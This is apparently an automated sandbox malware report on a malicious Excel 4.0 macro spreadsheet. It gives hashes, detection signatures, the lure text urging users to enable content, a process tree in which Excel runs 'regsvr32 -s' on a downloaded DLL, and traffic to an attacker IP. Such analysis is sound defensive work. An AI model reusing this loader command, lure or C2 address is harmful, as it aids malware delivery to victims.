Loading ...

Play interactive tourEdit tour

Windows Analysis Report Total_order_details_1231333.xlsb

Overview

General Information

Sample Name:Total_order_details_1231333.xlsb
Analysis ID:439079
MD5:7a915d04a60c318f37d2586b02587a26
SHA1:695dc190cd70d39a16a003400581353065f964af
SHA256:d8c12fb3fc8f75b90c2a11a84b190c7fb3736f08c78a45ab336bacd39f19d3b9
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7004 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6700 cmdline: regsvr32 -s ..\kdldyeff.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\kdldyeff.dll, CommandLine: regsvr32 -s ..\kdldyeff.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7004, ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll, ProcessId: 6700

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.180.199.121:80
    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.180.199.121:80
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.cortana.ai
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.office.net
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.onedrive.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://augloop.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://cdn.entity.
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://cortana.ai
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://cortana.ai/api
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://cr.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://directory.services.
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://graph.windows.net
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://graph.windows.net/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://login.windows.local
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://management.azure.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://management.azure.com/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://messaging.office.com/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://officeapps.live.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://onedrive.live.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://outlook.office.com/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://settings.outlook.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://tasks.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 14 Protected View This f
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start " 18 the decryption of the doc
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Total_order_details_1231333.xlsbInitial sample: CALL
    Source: Total_order_details_1231333.xlsbInitial sample: CALL
    Source: Total_order_details_1231333.xlsbInitial sample: EXEC
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: classification engineClassification label: mal64.expl.evad.winXLSB@3/9@0/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F2A7B5FE-39A0-4068-8850-AED8943E8D8D} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Total_order_details_1231333.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Total_order_details_1231333.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: Total_order_details_1231333.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: Total_order_details_1231333.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: Total_order_details_1231333.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
